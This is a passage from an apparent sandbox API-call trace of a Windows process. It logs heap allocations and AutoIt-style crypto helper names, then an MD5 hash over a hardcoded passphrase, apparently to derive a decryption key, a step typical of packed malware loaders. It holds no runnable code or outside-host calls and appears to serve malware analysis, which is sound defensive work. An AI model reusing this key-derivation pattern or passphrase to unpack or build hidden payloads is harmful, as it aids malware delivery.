Flags=0x0, Size=0x20) returned 0x43cfb30 [0075.604] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0075.605] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0075.605] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0075.605] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.605] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2390 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0075.606] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0075.606] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.606] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2390 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0075.606] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca418 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0075.607] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0075.608] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0075.608] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0075.609] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0075.610] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0075.610] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0075.610] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4a8 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0075.610] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0075.610] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0075.610] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0075.611] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca568 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0075.611] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e93c8 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0075.611] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c78 [0075.611] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca688 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0075.611] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.611] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0075.612] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c30 [0075.612] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0075.612] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0075.613] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0075.614] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.614] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0075.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0075.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca6e8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0075.615] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0075.615] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0075.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0075.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2ae8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0075.616] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0075.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0075.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0075.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.616] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0075.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca7d8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0075.616] CryptHashData (hHash=0x41ac440, pbData=0x17e2728, dwDataLen=0x22, dwFlags=0x1) returned 1 [0075.616] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.616] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0075.616] CharLowerBuffW 